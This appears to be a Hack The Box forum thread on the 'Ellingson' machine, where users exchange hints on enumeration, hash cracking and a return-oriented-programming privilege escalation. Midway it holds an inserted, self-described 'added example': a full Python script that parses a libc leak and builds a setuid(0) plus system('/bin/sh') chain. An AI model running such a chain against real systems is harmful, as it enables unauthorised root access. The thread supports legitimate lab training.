Ellingson

Hehehe, yes, it all makes sense, I'll try it as you say. After some hard sweat I got it working and, I admit, I was so happy jumping around that I didn't notice that… Thanks for your advice, and sorry to anyone who followed my not-completely-right answer, sorry.

@r1cin said:

Can anyone DM me on root? I'm testing my exploit locally; it's running well, but I'm not getting root, only a normal user.

You need an extra step in your chain. If you have popped the shell as a regular user, it should be trivial to add this extra call: just before invoking the shell you need to explicitly set the user ID you want.

Just look up the man page for this C function to locate its signature, pop the arguments, call this function in the second step (instead of the shell call), return to main again, and this time make the shell call and you'll get your privileged shell.

You don't need to return to main a second time; just do both in the same payload.

This is one of my first forays into messing with binary exploits without a guide, and my first time using pwntools. I'm having an issue with it while trying to follow along with some other tutorials, where recvuntil just hangs. I've heard talk of it being an issue with glibc buffering, but I haven't found a way around it. I'm hoping someone can point me in a good direction, because I'm fairly lost.

Thanks!

Hi. Can anyone confirm the file permissions of the shadow file? Is it readable by user h**?

Edit: I was reading the wrong file.

Hey. To get a low shell, do you need to brute-force the private key? Who brutes what? Give a hint. Thanks.

@c0mstr3am said:

Hey. To get a low shell, do you need to brute-force the private key? Who brutes what? Give a hint. Thanks.

No need to brute-force any private key; in the next steps you will need to brute-force some hashes, but not any SSH private key.

Btw, keys are involved in getting remote access to the server, but not that way.

@wizliz said:

This is one of my first forays into messing with binary exploits without a guide, and my first time using pwntools. I'm having an issue with it while trying to follow along with some other tutorials, where recvuntil just hangs. I've heard talk of it being an issue with glibc buffering, but I haven't found a way around it. I'm hoping someone can point me in a good direction, because I'm fairly lost.

Thanks!

@wizliz
Not sure if it is the same, but I had some issues with recvuntil() when testing the binary locally.
Playing with process() parameters worked for me; try stdin=PTY or shell=True as a second parameter when you open the binary with process(). That fixed my issues.

@rulzgz said:

@wizliz
Not sure if it is the same, but I had some issues with recvuntil() when testing the binary locally.
Playing with process() parameters worked for me; try stdin=PTY or shell=True as a second parameter when you open the binary with process(). That fixed my issues.

Thanks! I actually figured it out and got past that part a few days ago. I’ve got an exploit working on my Kali box locally, but not remotely. I’ve put up an Ubuntu box with a similar config to the target (where necessary, at least), and am trying to get the exploit to pop off there.

I think I’m going to eventually get it. Being new to this is a mix of frustration and fun.

@wizliz said:

Thanks! I actually figured it out and got past that part a few days ago. I’ve got an exploit working on my Kali box locally, but not remotely. I’ve put up an Ubuntu box with a similar config to the target (where necessary, at least), and am trying to get the exploit to pop off there.

I'm not sure who suggested this, but a VM is an absolutely unnecessary step.
Just learn how to use libc and the executable over an SSH connection from the box. Just 2 lines of code.
If you search the HTB forums you might find an almost-working solution in a different thread.
You can even set up SSH on Kali to act as a remote box for your experiments.

PS. This was my first binexp, nothing really hard here

Anyone having issues with this box? I'm not able to see much after accessing the IP via browser… I was looking for some code execution, reverse shell… I've reset the machine 3x… it's currently off at this point…

EDIT: I figured it out…

@v01t4ic said:

I'm not sure who suggested this, but a VM is an absolutely unnecessary step.
Just learn how to use libc and the executable over an SSH connection from the box. Just 2 lines of code.
If you search the HTB forums you might find an almost-working solution in a different thread.
You can even set up SSH on Kali to act as a remote box for your experiments.

PS. This was my first binexp, nothing really hard here

I’m glad it was easy for you. Unfortunately, that doesn’t mean it’s “easy” for everyone else. While setting up a VM might be “unnecessary,” it certainly doesn’t hurt to be able to see what exactly is going on.

Consider in the future that people have vastly different skill levels across the board. Binary Exploitation at this point is way over my head. I’m learning, slowly, but it can get very frustrating and is far from “easy” to me and many others.

@wizliz said:

I’m glad it was easy for you. Unfortunately, that doesn’t mean it’s “easy” for everyone else. While setting up a VM might be “unnecessary,” it certainly doesn’t hurt to be able to see what exactly is going on.

Consider in the future that people have vastly different skill levels across the board. Binary Exploitation at this point is way over my head. I’m learning, slowly, but it can get very frustrating and is far from “easy” to me and many others.

No hard feelings, I'm actually trying to help and make it easier. Pretty sure it is much faster to learn how to work over SSH than to set up a VM.
Whatever way you choose, feel free to PM for a nudge or help.

Woooo!! 6/5, best machine so far, shout-out to @Ic3M4n for such a fun box. Nothing feels forced, and yet every step is a helpful learning experience. Really for advanced peeps, but there are plenty of hints and cookie crumbs in this thread and on the machine to introduce new concepts. A healthy knowledge of Python will help, as well as learning about ROP and using gadgets to chain functions. Everything you need should be in the first 7-8 pages, but here are my condensed tips for Ellingson.

FOOTHOLD:
Enumeration is quick and easy, and is a perfect example of why always checking that all debuggers are turned off before migrating your app to a production server is a good idea.

USER:
You will need to think like OSCP and "Try Harder", because a rev shell won't work, so think of ways to enumerate the machine without one. When enumerating, don't be afraid of your own shadow, especially when you're backing up ;). If you find some hash browns, you'll want to go back to your website enumeration and look for a page with password hints; play it cewl with these hints and make your own wordlist, or combine the passwords with the relevant words from leaked password lists into one wordlist. Once you crack the eggs over your hash browns, you'll get the correct user if you wait long enough and get most (3/4?) of the cracked eggs. Everything else is a red herring.

ROOT:
Do the usual *nix privesc recon and you should find something that stands out. You'll need to write your own exploit for this binary. The video from ippsec is a godsend. Stage 1 is verbatim; stage 2 is almost the same, except that you'll need to call the special s**d function yourself (thanks @opt1kz!). For this you'll need to build your own ROP chain, and remember when building your chain that the argument to the function should go before the function.

GL!

PS> Yes, it's possible to write your own exploit without using the Python library discussed in ippsec's vid and on this thread (p*****ls). The builtin libs I used were struct, subprocess, os and signal. It was pretty difficult though, so I wouldn't recommend it unless you really want to learn about how Python handles I/O.

Rooted :slight_smile: Great box. I wonder how to do this in an automated way using ELF on the remote. I was looking in the docs but I can't find the answer. Anyone know the solution?

Going for root. Having a problem with pw*****s recv() to get the leak. I'm getting a malformed address that I can't convert, whatever I try. Has anybody had this issue? I'd very much appreciate a PM, because I feel like I've hit a brick wall and can't move forward.

I am getting close to root, but I keep getting the following error while attempting to run the second phase of the exploit: "Got EOF while reading in interactive". Could someone please give me a nudge?

User wasn't too bad. Basic web enum will get you your shell. From there, just run your basic privesc scripts; you will find some hashes that will lead you to user.txt. On to learning ROP chains!!

That was a really cool box! User was easy, root had a bit of a learning curve but once I understood what was needed it all fell into place. There are more than enough hints already in this forum that you shouldn’t need to pm anyone. However, if you don’t understand how a particular step works I would be happy to explain my limited knowledge to you or at least direct you to the proper google page :smiley:

Hello to all. Why is my Python not correctly converting addresses in memory? How do I deal with this?

p64(0x404028)
'(@@\x00\x00\x00\x00\x00'

p64(0x40179B)
'\x9b\x17@\x00\x00\x00\x00\x00'
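An added example, not code posted by anyone in this thread: a stdlib-only helper (struct, as the tips post mentions) that shows why the p64() output in the question above is actually correct, how a leaked pointer received over the socket is turned back into an integer, and how the stage-2 chain described earlier in the thread (set the user ID, then call the shell, in one payload, argument before function) is laid out on an x86-64 stack. Every address and offset below is a hypothetical placeholder, not a value from the Ellingson binary or its libc; take your own from readelf, objdump or a gadget finder.

```python
import struct

# Hypothetical placeholders for illustration only; they are NOT the real
# Ellingson binary/libc values. Substitute your own from readelf/ROPgadget.
LEAKED_SYM_OFF = 0x04F550   # libc offset of whatever symbol the stage-1 leak prints
SETUID_OFF     = 0x0E5970   # libc offset of setuid
SYSTEM_OFF     = 0x04F440   # libc offset of system
BINSH_OFF      = 0x1B3E9A   # libc offset of the "/bin/sh" string
POP_RDI_RET    = 0x401ABC   # "pop rdi; ret" gadget in the (non-PIE) binary
RET_GADGET     = 0x401016   # lone "ret" used for 16-byte stack alignment


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian value, the same thing pwntools' p64() does.

    The repr only looks wrong because Python prints printable bytes as
    characters: 0x28 is '(' and 0x40 is '@', so p64(0x404028) displays as
    b'(@@\\x00\\x00\\x00\\x00\\x00'. The bytes themselves are correct.
    """
    return struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)


def u64(data: bytes) -> int:
    """Unpack 1..8 little-endian bytes; short inputs are zero-padded on the right."""
    if not 1 <= len(data) <= 8:
        raise ValueError(f"expected 1..8 bytes, got {len(data)}")
    return struct.unpack("<Q", data.ljust(8, b"\x00"))[0]


def parse_leak(raw: bytes) -> int:
    """Turn the raw bytes recv()'d for a leaked pointer into an integer.

    Two usual reasons a leak looks 'malformed': the trailing newline is still
    attached, or the pointer is only 6 bytes long (user-space addresses have
    zero top bytes, which the leaking code often does not emit).
    """
    return u64(raw.rstrip(b"\r\n"))


def libc_base(leak: int) -> int:
    """Derive the libc base from the leak; a real base is page aligned."""
    base = leak - LEAKED_SYM_OFF
    if base & 0xFFF:
        raise ValueError(f"base {base:#x} is not page aligned: wrong offset or bad leak")
    return base


def build_stage2(base: int, padding: int, align: bool = False) -> bytes:
    """Stage-2 chain: setuid(0) followed by system("/bin/sh") in one payload.

    x86-64 SysV passes the first argument in rdi, so each call is laid out as
    [pop rdi; ret] [argument] [function]: the argument sits before the
    function. `align` drops in a lone ret so rsp is 16-byte aligned when
    system() runs, which avoids the movaps crash inside glibc.
    """
    chain = b"A" * padding                       # filler up to the saved return address
    chain += p64(POP_RDI_RET) + p64(0) + p64(base + SETUID_OFF)
    if align:
        chain += p64(RET_GADGET)
    chain += p64(POP_RDI_RET) + p64(base + BINSH_OFF) + p64(base + SYSTEM_OFF)
    return chain


def chain_words(chain: bytes, padding: int) -> list:
    """Decode a chain back into its 8-byte words, handy for eyeballing it."""
    body = chain[padding:]
    return [u64(body[i:i + 8]) for i in range(0, len(body), 8)]


if __name__ == "__main__":
    # Constructed sample leak: 6 pointer bytes plus the newline recv() left on.
    sample = b"\x50\x65\x5b\x34\x12\x7f\n"
    base = libc_base(parse_leak(sample))
    payload = build_stage2(base, padding=72, align=True)
    for i, word in enumerate(chain_words(payload, 72)):
        print(f"[{i}] {word:#018x}")
```

With pwntools you would send the result of build_stage2() exactly as you send the stage-1 payload; the padding length is whatever distance to the saved return address you measured when writing stage 1. If the shell call in stage 2 crashes right before the prompt appears, try it again with align=True before suspecting the addresses.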

@redshift said:
Going for root. Having a problem with pw*****s recv() to get the leak. I’m getting a malformed address, that I can’t convert whatever I try. Has anybody had this issue? I’d very much appreciate a PM, because I feel like I’ve hit a brick wall and can’t move forward.

+1, the same problem with converting addresses.

Finally rooted, thanks to @AzAxIaL.

If anyone wants help with root, please message me via Discord.
There are good hints in these forums to get user.